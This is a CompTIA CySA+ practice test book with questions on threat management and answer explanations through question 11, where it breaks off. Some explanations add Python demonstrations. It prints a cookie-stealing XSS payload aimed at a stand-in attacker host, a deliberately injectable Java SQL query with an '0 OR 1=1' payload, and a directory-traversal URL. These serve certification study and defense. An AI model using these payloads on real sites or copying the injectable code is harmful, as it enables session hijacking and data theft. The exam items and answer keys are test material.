CySA-002 Practice Test


CompTIA CySA+ CS0-002 Practice Tests 2021®
Published by: ExamsDigest LLC., Holzmarktstraße 73, Berlin, Germany,
www.examsdigest.com Copyright © 2021 by ExamsDigest LLC.

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form, electronic, mechanical, photocopying, recording, scanning or otherwise, except as permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without the prior written permission of the Publisher. Requests to the Publisher for permission should be addressed to the Permissions Department, Examsdigest, LLC., Holzmarktstraße 73, Berlin, Germany or online at https://www.examsdigest.com/contact.

Trademarks: Examsdigest, examsdigest.com and related trade dress are trademarks or registered trademarks of Examsdigest LLC. and may not be used without written permission. Amazon is a registered trademark of Amazon, Inc. All other trademarks are the property of their respective owners. Examsdigest, LLC. is not associated with any product or vendor mentioned in this book.

LIMIT OF LIABILITY/DISCLAIMER OF WARRANTY: THE PUBLISHER AND THE AUTHOR MAKE NO REPRESENTATIONS OR WARRANTIES WITH RESPECT TO THE ACCURACY OR COMPLETENESS OF THE CONTENTS OF THIS WORK AND SPECIFICALLY DISCLAIM ALL WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE. NO WARRANTY MAY BE CREATED OR EXTENDED BY SALES OR PROMOTIONAL MATERIALS. THE ADVICE AND STRATEGIES CONTAINED HEREIN MAY NOT BE SUITABLE FOR EVERY SITUATION. THIS WORK IS SOLD WITH THE UNDERSTANDING THAT THE PUBLISHER IS NOT ENGAGED IN RENDERING LEGAL, ACCOUNTING, OR OTHER PROFESSIONAL SERVICES. IF PROFESSIONAL ASSISTANCE IS REQUIRED, THE SERVICES OF A COMPETENT PROFESSIONAL PERSON SHOULD BE SOUGHT. NEITHER THE PUBLISHER NOR THE AUTHOR SHALL BE LIABLE FOR DAMAGES ARISING HEREFROM. THE FACT THAT AN ORGANIZATION OR WEBSITE IS REFERRED TO IN THIS WORK AS A CITATION AND/OR A POTENTIAL SOURCE OF FURTHER INFORMATION DOES NOT MEAN THAT THE AUTHOR OR THE PUBLISHER ENDORSES THE INFORMATION THE ORGANIZATION OR WEBSITE MAY PROVIDE OR RECOMMENDATIONS IT MAY MAKE.

Examsdigest publishes in a variety of print and electronic formats and by print-on-demand. Some material included with standard print versions of this book may not be included in e-books or in print-on-demand. If this book refers to media such as a CD or DVD that is not included in the version you purchased, you may find this material at https://examsdigest.com

CONTENTS AT A GLANCE

Introduction
Chapter 1 Threat and Vulnerability Management
  Questions 1-20
  Answers 1-20
Chapter 2 Software and Systems Security
  Questions 21-35
  Answers 21-35
Chapter 3 Security Operations and Monitoring
  Questions 36-50
  Answers 36-50
Chapter 4 Incident Response
  Questions 51-65
  Answers 51-65
Chapter 5 Compliance and Assessment
  Questions 66-75
  Answers 66-75
The End

INTRODUCTION
CompTIA Cybersecurity Analyst (CySA+) is an IT workforce
certification that applies behavioral analytics to networks and
devices to prevent, detect and combat cybersecurity threats
through continuous security monitoring.

About This Book

CompTIA CySA+ CS0-002 Practice Tests 2020 by Examsdigest is designed to be a practical practice exam guide that will help you prepare for the CompTIA CySA+ CS0-002 exams. As the book title says, it includes 80+ questions, organized by exam so that you can prepare for the final exam.

This book has been designed to help you prepare for the style
of questions you will receive on the CompTIA CySA+ CS0-002
exams. It also helps you understand the topics you can expect
to be tested on for each exam.

In order to properly prepare for the CompTIA CySA+ CS0-002, I recommend that you:

✓ Review a reference book: CompTIA CySA+ CS0-002 by
Examsdigest is designed to give you sample questions to help
you prepare for the style of questions you will receive on the
real certification exam. However, it is not a reference book that
teaches the concepts in detail. That said, I recommend that you
review a reference book before attacking these questions so
that the theory is fresh in your mind.

✓ Get some practical, hands-on experience: After you review the theory, I highly recommend getting hands-on with tools such as Kali Linux or Metasploitable. The more hands-on experience you have, the easier the exams will be.

✓ Do practice test questions: After you review a reference book and perform some hands-on work, attack the questions in this book to get yourself “exam ready”! Also claim your free 1-month access on our platform to dive into more questions, flashcards and much more.

Beyond The Book

This book gives you plenty of CompTIA CySA+ CS0-002 questions to work on, but maybe you want to track your progress as you tackle the questions, or maybe you’re having trouble with certain types of questions and wish they were all presented in one place where you could methodically make your way through them. You’re in luck. Your book purchase comes with a free one-month subscription to all practice questions online and more. You get on-the-go access any way you want it, from your computer, smartphone, or tablet. Track your progress and view personalized reports that show where you need to study the most. Study what, where, when, and how you want!

What you’ll find online

The online practice that comes free with this book offers you
the same questions and answers that are available here and
more.

The beauty of the online questions is that you can customize your online practice to focus on the topic areas that give you the most trouble.

So if you need help with the domain Network Security, then se-
lect questions related to this topic online and start practicing.

Whether you practice a few hundred problems in one sitting or a couple dozen, and whether you focus on a few types of problems or practice every type, the online program keeps track of the questions you get right and wrong so that you can monitor your progress and spend time studying exactly what you need.

You can access these online tools by sending an email to [email protected] to claim access on our platform. Once we confirm the purchase you can enjoy your free access.

CompTIA CySA+ CS0-002 Exam Details


✓ Format - Multiple choice and performance-based
✓ Delivery Method - Testing center or online proctored exam
✓ Time - 165 minutes to complete the exam
✓ Cost - $359
✓ Language - Available in English, Japanese

Exam Content

Content Outline
With the end goal of proactively defending and continuously
improving the security of an organization, CySA+ will verify the
successful candidate has the knowledge and skills required to:
• Leverage intelligence and threat detection techniques
• Analyze and interpret data
• Identify and address vulnerabilities
• Suggest preventative measures
• Effectively respond to and recover from incidents
This is equivalent to 4 years of hands-on experience in a technical cybersecurity job role.

The following topics are general guidelines for the content likely to be included on the exam. However, other related topics may also appear on any specific delivery of the exam. To better reflect the contents of the exam and for clarity purposes, the guidelines below may change at any time without notice.

1.0: Threat and Vulnerability Management (22%)
2.0: Software and Systems Security (18%)
3.0: Security Operations and Monitoring (25%)
4.0: Incident Response (22%)
5.0: Compliance and Assessment (13%)

CHAPTER 1
THREAT AND VULNERABILITY MANAGEMENT

Questions 1-20

Question 1. In the cybersecurity and threat intelligence industries, there are several approaches used to analyze and track the characteristics of cyber intrusions by advanced threat actors. Which of the following approaches emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims?
(A) Attack vector
(B) MITRE ATT&CK
(C) The Diamond Model of Intrusion Analysis
(D) Kill chain

Question 2. Which of the following tools are infrastructure vulnerability scanners? (Choose all that apply)
(A) Nessus
(B) OpenVAS
(C) Qualys
(D) Prowler
(E) Burp Suite

Question 3. You open the command prompt and type the following command to find out which ports on your system are open.

lsof -Pn -i4 | grep LISTEN

After typing the command you receive the following results.

127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)

Which of the following services are not currently running on your system? (Choose all that apply)
(A) FTP
(B) SSH
(C) DHCP
(D) SMTP
(E) RDP

Question 4. A malicious user exploited a bug in a system and gained elevated access to resources that should normally be unavailable to him. Which type of attack was conducted in that system?
(A) Access escalation
(B) Elevated access
(C) Privilege escalation
(D) Elevated Privilege

Question 5. In which of the following types of attacks does an unauthorized user gain access to a system or network and remain there for an extended period of time without being detected, with the main goal of stealing data rather than causing damage to the network or system?
(A) Zero-day
(B) Advanced persistent threat
(C) Fuzzing
(D) Nikto

Question 6. Which of the following threat actor terms describes the act of breaking into a computer system for politically or socially motivated purposes?
(A) Insider threat
(B) Nation-state
(C) Hacktivist
(D) Zero-day

Question 7. Active Vulnerability Scanners identify the active operating systems, applications, and ports throughout a network and provide information about weaknesses but they can’t take any action to resolve security problems. (True/False)
(A) TRUE
(B) FALSE

Question 8. You have been hired as a security analyst to conduct a source code analysis on different websites. After spending hours determining whether the sites are compromised, you notice the following code snippet:

http://www.client-website.com/search?<script>location.href='http://www.villainsite.com/hijacker.php?cookie='+document.cookie;</script>

Which of the following attacks is the attacker trying to conduct on your client’s website?
(A) Rootkit
(B) Cross-site scripting
(C) Impersonation
(D) SQL injection

Question 9. The developer of your company wrote the following code snippet in Java to show the account numbers and balances for the current user’s ID as provided in a URL.

String accountBalanceQuery =
    "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = "
    + request.getParameter("user_id");
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBalanceQuery);
while (rs.next()) {
    page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
}

Under normal operation, the user with ID 4 might be logged in and visit the URL https://mybank.ebanking/show_balances?user_id=4. This means that accountBalanceQuery would end up being:

SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 4

An attacker changed the parameter user_id so that it is interpreted as: 0 OR 1=1

When this query is passed to the database, it returns all the account numbers and balances it has stored, and rows are added to the page to show them. The attacker now knows every user’s account numbers and balances. Which of the following types of attack is conducted against the website?
(A) Extensible markup language (XML) attack
(B) Overflow attack
(C) Credential stuffing
(D) Structured query language (SQL) injection

Question 10. Which of the following monitoring solutions should you implement that provides the most accurate and updated information about any vulnerabilities present in a given system?
(A) Agent-based
(B) Server-based
(C) External
(D) Internal

Question 11. You just completed an HPING scan and received the following output:

HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 headers + 0 data bytes
len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50 flags=RA seq=0 win=0 rtt=264.3 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51 flags=RA seq=1 win=0 rtt=277.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52 flags=RA seq=2 win=0 rtt=285.4 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53 flags=SA seq=3 win=49312 rtt=270.7 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54 flags=RA seq=4 win=0 rtt=225.1 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55 flags=RA seq=5 win=0 rtt=202.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56 flags=RA seq=6 win=0 rtt=196.7 ms

Based on these results, which of the following services returned a SYN-ACK?
(A) DHCP
(B) DNS
(C) SMTP
(D) IMAP

Question 12. The Internet of Things (IoT) is a network of physical objects that are embedded with sensors, software, and other technologies for the purpose of connecting and exchanging data with other devices and systems over the Internet. Which of the following is NOT considered an IoT threat or vulnerability?
(A) Insecure network services
(B) Lack of secure update mechanism
(C) Lack of physical hardening
(D) Unoptimized software code

Question 13. A telecom company may promise network availability of 99.999 percent and allow the customer to reduce their payment by a given percentage if that is not achieved. Which of the following agreements is described in this example?
(A) Memorandum of understanding
(B) Service-level agreement
(C) Organizational governance
(D) Business process interruption

Question 14. The developer of your company is writing software in the C language. As he is a junior software engineer, he needs your help choosing secure functions for his projects. Which of the following functions should he avoid because it is considered insecure?
(A) strcpy()
(B) strncpy()
(C) strlen()
(D) strlwr()

Question 15. While interpreting assessment reports from the Acunetix Vulnerability Scanner, you identified a vulnerability in the system with a Common Vulnerability Scoring System (CVSS) value of (L) and a score of 0.395. Based on the given scenario, which of the following statements would be true?
(A) There is no impact on the availability of the system
(B) The attacker must either have physical access to the vulnerable system or a local account
(C) The attacker must authenticate once in order to exploit the vulnerability
(D) There is no impact on the confidentiality of the system

Question 16. In your company you are using a web vulnerability scanner named Acunetix to check whether your website and web applications are vulnerable. While reviewing a scan report you saw the following URL:

http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1

What type of attack is conducted on that website?
(A) Password spraying
(B) Directory traversal
(C) Privilege escalation
(D) On-path attack

Question 17. An organization has hired a cybersecurity analyst to conduct an assessment of its current wireless network security. He has been tasked to capture the inbound and outbound packets and export the data to text files for further processing by third-party tools. Which of the following tools should the analyst use to complete the task?
(A) ScoutSuite
(B) Pacu
(C) Prowler
(D) Aircrack-ng

Question 18. You have been hired as a cybersecurity analyst to conduct an assessment against the organization’s network. Now you are in the process of trying to discover as many attack vectors as possible that can be used to exploit the systems further. Which of the following is the phase you are currently in?
(A) Static analysis
(B) Reverse engineering
(C) Enumeration
(D) Dynamic analysis

Question 19. Your company has moved its workloads from its on-premises environment to Amazon Web Services (AWS) to benefit from substantial IT cost savings, business agility, and operational resilience. You have been tasked to recommend a tool that enables security posture assessment of cloud environments. Which of the following tools should you recommend to complete the task?
(A) Scout Suite
(B) Aircrack-ng
(C) oclHashcat
(D) Reaver

Question 20. You are working on an application with multiple serverless functions and your task is to deploy a REST API using Serverless, Express, and Node.js. Which of the following actions should you perform to ensure that a vulnerability in one function doesn’t escalate and compromise others as well?
(A) Maintain isolated function perimeters
(B) Employ API gateways as a security buffer
(C) Secure and verify data in transit
(D) Patch function dependencies

Answers 1-20

Question 1. In the cybersecurity and threat intelligence industries, there are several approaches used to analyze and track the characteristics of cyber intrusions by advanced threat actors. Which of the following approaches emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims?
(A) Attack vector
(B) MITRE ATT&CK
(C) The Diamond Model of Intrusion Analysis
(D) Kill chain

Explanation 1. The Diamond Model of Intrusion Analysis is the correct answer. In the cybersecurity and threat intelligence industries, there are several approaches used to analyze and track the characteristics of cyber intrusions by advanced threat actors. One popular approach is the Diamond Model of Intrusion Analysis.

This model emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims. The main axiom of this model states, “For every intrusion event, there exists an adversary taking a step toward an intended goal by using a capability over infrastructure against a victim to produce a result.” This means that an intrusion event is defined as how the attacker demonstrates and uses certain capabilities and techniques over infrastructure against a target.

Attack vector is incorrect. In cyber security, an attack vector is a method or pathway used by a hacker to access or penetrate the target system. Hackers steal information, data and money from people and organizations by investigating known attack vectors and attempting to exploit vulnerabilities to gain access to the desired system.

MITRE ATT&CK is incorrect. The MITRE ATT&CK framework is a comprehensive matrix of tactics and techniques used by threat hunters, red teamers, and defenders to better classify attacks and assess an organization’s risk.

The aim of the framework is to improve post-compromise detection of adversaries in enterprises by illustrating the actions an attacker may have taken.

Kill chain is incorrect. The cyber kill chain is a series of steps that trace the stages of a cyberattack from the early reconnaissance stages to the exfiltration of data. The kill chain helps us understand and combat ransomware, security breaches, and advanced persistent threats (APTs).

Question 2. Which of the following tools are infrastructure vulnerability scanners? (Choose all that apply)
(A) Nessus
(B) OpenVAS
(C) Qualys
(D) Prowler
(E) Burp Suite

Explanation 2. Nessus, OpenVAS and Qualys are the correct answers. Vulnerability scanners are automated tools that allow organizations to check if their networks, systems and applications have security weaknesses that could expose them to attacks.

Prowler is incorrect because this is a cloud infrastructure assessment tool.

Burp Suite is incorrect because this is a web application scanner.

Question 3. You open the command prompt and type the fol-
lowing command to find out which ports on your system are
open.

lsof -Pn -i4 | grep LISTEN

After typing the command you receive the following results.

127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)

Which of the following services are not currently running on your system? (Choose all that apply)
(A) FTP
(B) SSH
(C) DHCP
(D) SMTP
(E) RDP

Explanation 3. FTP and RDP are the correct answers. FTP uses port 21 for its service and RDP uses port 3389. According to the results you receive from the command lsof -Pn -i4 | grep LISTEN, your workstation uses the following services:
- SSH port 22
- DNS port 53
- DHCP port 68
- SMTP port 25

Question 4. A malicious user exploited a bug in a system and
gained elevated access to resources that should normally be
unavailable to him. Which type of attack was conducted in that
system?
(A) Access escalation
(B) Elevated access
(C) Privilege escalation
(D) Elevated Privilege

Explanation 4. Privilege escalation is the correct answer. Privilege escalation happens when a malicious user exploits a bug, design flaw, or configuration error in an application or operating system to gain elevated access to resources that should normally be unavailable to that user. The attacker can then use the newly gained privileges to steal confidential data, run administrative commands, or deploy malware.

Question 5. In which of the following types of attacks does an unauthorized user gain access to a system or network and remain there for an extended period of time without being detected, with the main goal of stealing data rather than causing damage to the network or system?
(A) Zero-day
(B) Advanced persistent threat
(C) Fuzzing
(D) Nikto

Explanation 5. Advanced persistent threat is the correct answer. An advanced persistent threat is an attack in which an unauthorized user gains access to a system or network and remains there for an extended period of time without being detected. Advanced persistent threats are particularly dangerous for enterprises, as hackers have ongoing access to sensitive company data. Advanced persistent threats generally do not cause damage to company networks or local machines. Instead, the goal of advanced persistent threats is most often data theft.

Zero-day is incorrect. A zero-day exploit is a cyber attack that occurs on the same day a weakness is discovered in software. At that point, it’s exploited before a fix becomes available from its creator.

Fuzzing is incorrect because it is a software assessment tool.

Nikto is incorrect because it is a web application scanner.

Question 6. Which of the following threat actor terms describes the act of breaking into a computer system for politically or socially motivated purposes?
(A) Insider threat
(B) Nation-state
(C) Hacktivist
(D) Zero-day

Explanation 6. Hacktivist is the correct answer. Derived from combining the words ‘Hack’ and ‘Activism’, hacktivism is the act of hacking, or breaking into a computer system, for politically or socially motivated purposes.

Insider threat is incorrect. An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization’s security practices, data and computer systems.

Nation-state is incorrect. Nation-state hackers target government agencies, critical infrastructure, and any and all industries known to contain sensitive data or property. Typically, they strike via sophisticated techniques that interrupt business operations, leak confidential information, and generate massive data and revenue loss.

Zero-day is incorrect. A zero-day exploit is a cyber attack that occurs on the same day a weakness is discovered in software. At that point, it’s exploited before a fix becomes available from its creator. Initially, when a user discovers that there is a security risk in a program, they can report it to the software company, which will then develop a security patch to fix the flaw.

Question 7. Active Vulnerability Scanners identify the active operating systems, applications, and ports throughout a network and provide information about weaknesses but they can’t take any action to resolve security problems. (True/False)
(A) TRUE
(B) FALSE

Explanation 7. FALSE is the correct answer. Passive Vulnerability Scanners identify the active operating systems, applications, and ports throughout a network and provide information about weaknesses but they can’t take any action to resolve security problems.

Active scanners send transmissions to the network’s nodes, examining the responses they receive to evaluate whether a specific node represents a weak point within the network. Active scanners can take action to autonomously resolve security issues, such as blocking a potentially dangerous IP address.

Question 8. You have been hired as a security analyst to conduct a source code analysis on different websites. After spending hours determining whether the sites are compromised, you notice the following code snippet:

http://www.client-website.com/search?<script>location.href='http://www.villainsite.com/hijacker.php?cookie='+document.cookie;</script>

Which of the following attacks is the attacker trying to conduct on your client’s website?
(A) Rootkit
(B) Cross-site scripting
(C) Impersonation
(D) SQL injection

Explanation 8. Cross-site scripting is the correct answer. Cross-site scripting (XSS) is one of the most widespread methods of web session hijacking. By exploiting server or application vulnerabilities, attackers inject client-side scripts into web pages, so that a victim's browser executes attacker-controlled code when it loads the compromised page.

For example, attackers may distribute emails or instant messages with a specially crafted link pointing to a known and trusted website but containing HTTP query parameters that exploit a known vulnerability to inject script code. For an XSS attack used for session hijacking, the code might send the session key to the attacker's own website, for instance:

    http://www.website.com/search?<script>location.href='http://www.VillainSite.com/hijacker.php?cookie='+document.cookie;</script>

The script reads the current session cookie with document.cookie and sends it to the attacker's website by setting the browser's location URL with location.href. This is a reflected XSS payload: it only runs if the search page echoes the query parameter into its HTML response without encoding it, and the cookie is only exposed to script if it was set without the HttpOnly flag.
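As an added example (not code from the book), the following Python script reproduces the reflected XSS above offline: it takes the raw query string of the question's URL, renders it once the way a vulnerable search page would and once after HTML-entity encoding, then lists which hosts an inline script would send the browser (and its cookies) to. The hosts are the hypothetical ones from the question; the search page itself is a stand-in.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample: the URL from the question, with its hypothetical hosts.
SAMPLE_URL = (
    "http://www.client-website.com/search?"
    "<script>location.href='http://www.villainsite.com/hijacker.php?"
    "cookie='+document.cookie;</script>"
)

# Matches real <script> elements, including the "</script >" spelling in the book.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
HREF_RE = re.compile(r"location\.href\s*=\s*['\"](https?://[^/'\"]+)")


def search_term_from_url(url):
    """Return the raw query string, i.e. the text a search page would echo back.
    It is left undecoded so the payload reads exactly as it does in the report."""
    return urlsplit(url).query


def encode_for_html(text):
    """Output encoding: < > & " ' become &lt; &gt; &amp; &quot; &#x27;, so the
    browser displays them as text instead of parsing them as markup."""
    return html.escape(text, quote=True)


def render_search_vulnerable(term):
    """Reflects the term straight into the HTML body: reflected XSS."""
    return f"<h1>Search</h1><p>Results for: {term}</p>"


def render_search_safe(term):
    """Same page, but the term is entity-encoded before it is reflected."""
    return f"<h1>Search</h1><p>Results for: {encode_for_html(term)}</p>"


def find_inline_scripts(page):
    """Bodies of the <script> elements a browser would execute on this page."""
    return [m.group(1) for m in SCRIPT_RE.finditer(page)]


def exfiltration_hosts(page):
    """Hosts an inline script would navigate the browser to via location.href,
    carrying whatever document.cookie exposed. Encoded text never qualifies,
    because after encoding there is no <script> element left to run."""
    hosts = []
    for body in find_inline_scripts(page):
        for m in HREF_RE.finditer(body):
            hosts.append(urlsplit(m.group(1)).hostname)
    return hosts


if __name__ == "__main__":
    term = search_term_from_url(SAMPLE_URL)
    print("vulnerable page leaks cookies to:", exfiltration_hosts(render_search_vulnerable(term)))
    print("encoded page leaks cookies to:   ", exfiltration_hosts(render_search_safe(term)))
    print(render_search_safe(term))
```

The encoded page still shows the attacker's text to the user, but as inert characters; that is the whole point of output encoding at the HTML boundary, and it is independent of whatever input validation the search form does.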

Rootkit is incorrect. A rootkit is malware designed to infect a target computer and give an attacker a set of tools that grant persistent, hidden remote access to it. It is a post-compromise implant, not something delivered through a URL parameter.

Impersonation is incorrect. An impersonation attack is a form of fraud in which attackers pose as a known or trusted person to dupe an employee into transferring money to a fraudulent account, sharing sensitive information (such as intellectual property, financial data or payroll information), or revealing login credentials that attackers can use to break into a company's network.

SQL injection is incorrect. SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. The snippet above contains JavaScript aimed at the browser, not SQL aimed at the database.

Question 9. A developer at your company wrote the following Java code snippet to show the account numbers and balances for the user ID supplied in a URL:

    // Deliberately vulnerable: the user_id parameter is concatenated into the SQL text.
    String accountBalanceQuery =
        "SELECT accountNumber, balance FROM accounts WHERE account_owner_id = "
        + request.getParameter("user_id");
    Statement statement = connection.createStatement();
    ResultSet rs = statement.executeQuery(accountBalanceQuery);
    while (rs.next()) {
        page.addTableRow(rs.getInt("accountNumber"), rs.getFloat("balance"));
    }

Under normal operation, the user with ID 4 might be logged in and visit the URL https://mybank.ebanking/show_balances?user_id=4. accountBalanceQuery would then be:

    SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 4

An attacker changed the "user_id" parameter to 0 OR 1=1, so the query became:

    SELECT accountNumber, balance FROM accounts WHERE account_owner_id = 0 OR 1=1

Because 1=1 is always true, the database returned every account number and balance it stores, and a row was added to the page for each of them. The attacker now knows every user's account numbers and balances. Which of the following types of attack is conducted against the website?
(A) Extensible markup language (XML) attack
(B) Overflow attack
(C) Credential stuffing
(D) Structured query language (SQL) injection

Explanation 9. Structured query language (SQL) injection is the correct answer. SQL injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements against the database server behind a web application. Attackers use SQL injection vulnerabilities to bypass application security measures: they can get around the authentication and authorization of a web page or web application and retrieve the content of the entire SQL database, and they can also add, modify and delete records. The root cause in the snippet is that untrusted input is concatenated into the query text; the fix is to pass it as a bound parameter of a prepared statement (PreparedStatement in Java) so the database never interprets it as SQL.
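The same flaw and its fix, as an added Python example rather than the book's Java: a SQLite database loaded with constructed sample accounts, a query built by string concatenation exactly as in the snippet, and the parameterized version. The account data and user IDs are made up.

```python
import sqlite3

# Constructed sample data standing in for the bank's accounts table.
ACCOUNTS = [
    # accountNumber, account_owner_id, balance
    (1001, 4, 250.00),
    (1002, 4, 1200.50),
    (2001, 7, 99.99),
    (3001, 9, 5000.00),
]


def open_bank_db():
    """In-memory SQLite database loaded with the sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts ("
        "accountNumber INTEGER, account_owner_id INTEGER, balance REAL)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return conn


def show_balances_vulnerable(conn, user_id):
    """Mirrors the Java snippet: the request parameter is pasted into the SQL
    text, so '0 OR 1=1' rewrites the WHERE clause instead of being compared."""
    query = (
        "SELECT accountNumber, balance FROM accounts "
        "WHERE account_owner_id = " + user_id + " ORDER BY accountNumber"
    )
    return conn.execute(query).fetchall()


def show_balances_parameterized(conn, user_id):
    """The fix: the value is bound to a placeholder and never parsed as SQL.
    A payload such as '0 OR 1=1' is compared, as one string value, against the
    owner id column and matches nothing. Validating user_id as an integer
    first is a worthwhile extra layer, but it is the binding that stops the
    injection."""
    query = (
        "SELECT accountNumber, balance FROM accounts "
        "WHERE account_owner_id = ? ORDER BY accountNumber"
    )
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = open_bank_db()
    for uid in ("4", "0 OR 1=1"):
        print(f"user_id={uid!r}")
        print("  concatenated :", show_balances_vulnerable(db, uid))
        print("  parameterized:", show_balances_parameterized(db, uid))
```

Run it and the concatenated query returns all four accounts for the injected value, while the parameterized query returns two rows for "4" and none for the payload.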

Extensible markup language (XML) attack is incorrect. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server's filesystem and to interact with any back-end or external systems that the application itself can access. The request in the question carries a plain query parameter, not XML.

Overflow attack is incorrect. Attackers exploit buffer overflow issues by overwriting the memory of an application. This changes the execution path of the program, triggering a response that damages files or exposes private information. For example, an attacker may introduce extra code, sending new instructions to the application to gain access to IT systems.

Credential stuffing is incorrect. Credential stuffing is a cyberattack method in which attackers use lists of compromised user credentials to break into a system. The attack uses bots for automation and scale and is based on the assumption that many users reuse usernames and passwords across multiple services. Statistics show that about 0.1% of breached credentials attempted on another service will result in a successful login.

Question 10. Which of the following monitoring solutions should you implement to get the most accurate and up-to-date information about any vulnerabilities present in a given system?
(A) Agent-based
(B) Server-based
(C) External
(D) Internal
Explanation 10. Agent-based is the correct answer. Agent-based monitoring installs software on the host itself, so it can collect, analyze and process far more data about that system than a remote scan can (installed packages, patch level, configuration files, running processes), and it keeps reporting between network scans. Vendors typically provide agents written specifically for their own platforms and programmed to interface with them directly. Server-based (agentless) scanning, whether run from an internal or an external vantage point, only sees what the target exposes over the network at scan time.

Question 11. You just completed an hping scan and received the following output:

    HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 headers + 0 data bytes
    len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50 flags=RA seq=0 win=0 rtt=264.3 ms
    len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51 flags=RA seq=1 win=0 rtt=277.6 ms
    len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52 flags=RA seq=2 win=0 rtt=285.4 ms
    len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53 flags=SA seq=3 win=49312 rtt=270.7 ms
    len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54 flags=RA seq=4 win=0 rtt=225.1 ms
    len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55 flags=RA seq=5 win=0 rtt=202.6 ms
    len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56 flags=RA seq=6 win=0 rtt=196.7 ms

Based on these results, which of the following services re-
turned an SYN-ACK?
(A) DHCP
(B) DNS
(C) SMTP
(D) IMAP

Explanation 11. DNS is the correct answer. In hping output, sport is the source port of the reply, that is, the port probed on the target, and flags shows the TCP flags the target answered with. Most probes returned RA (RST/ACK) packets with win=0, which means those ports are closed. The only probe that returned SA (SYN/ACK), with a non-zero window, was the one directed at port 53, indicating an open port.

DNS uses port 53. Firewalls very commonly allow it so that resolvers can answer queries, which is also why attackers like to tunnel traffic over it. DHCP uses ports 67 and 68, SMTP uses 25 and IMAP uses 143, none of which appear in the output.
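To turn that reading into a repeatable check, here is an added Python example (not from the book) that parses the hping output shown above, embedded as a string copied from the question, and classifies each probed port from the flags field.

```python
import re

# Sample input: the hping output from the question, pasted as text.
HPING_OUTPUT = """\
HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 headers + 0 data bytes
len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50 flags=RA seq=0 win=0 rtt=264.3 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51 flags=RA seq=1 win=0 rtt=277.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52 flags=RA seq=2 win=0 rtt=285.4 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53 flags=SA seq=3 win=49312 rtt=270.7 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54 flags=RA seq=4 win=0 rtt=225.1 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55 flags=RA seq=5 win=0 rtt=202.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56 flags=RA seq=6 win=0 rtt=196.7 ms
"""

# One reply line: the fields we need are the responder's port and its TCP flags.
REPLY_RE = re.compile(
    r"ip=(?P<ip>\S+)\s.*?\bsport=(?P<port>\d+)\s+flags=(?P<flags>[A-Z]*)"
)

# Well-known ports for the services offered as answer options.
SERVICE_BY_PORT = {25: "SMTP", 53: "DNS", 67: "DHCP", 68: "DHCP", 143: "IMAP"}


def classify_replies(output):
    """Map each probed port to its state as inferred from the reply flags.
    In hping output 'sport' is the source port of the reply, i.e. the port
    probed on the target. SA (SYN/ACK) means the port accepted our SYN and
    is open; RA (RST/ACK) means it is closed. Probes that get no reply at
    all never produce a line here, which in practice means filtered."""
    states = {}
    for line in output.splitlines():
        m = REPLY_RE.search(line)
        if not m:
            continue  # banner line or noise
        flags = set(m.group("flags"))
        if {"S", "A"} <= flags:
            state = "open"
        elif "R" in flags:
            state = "closed"
        else:
            state = "unknown"
        states[int(m.group("port"))] = state
    return states


def open_services(output):
    """(port, service) pairs for every port that answered SYN/ACK."""
    return [
        (port, SERVICE_BY_PORT.get(port, "unknown"))
        for port, state in sorted(classify_replies(output).items())
        if state == "open"
    ]


if __name__ == "__main__":
    for port, state in sorted(classify_replies(HPING_OUTPUT).items()):
        print(f"port {port}: {state}")
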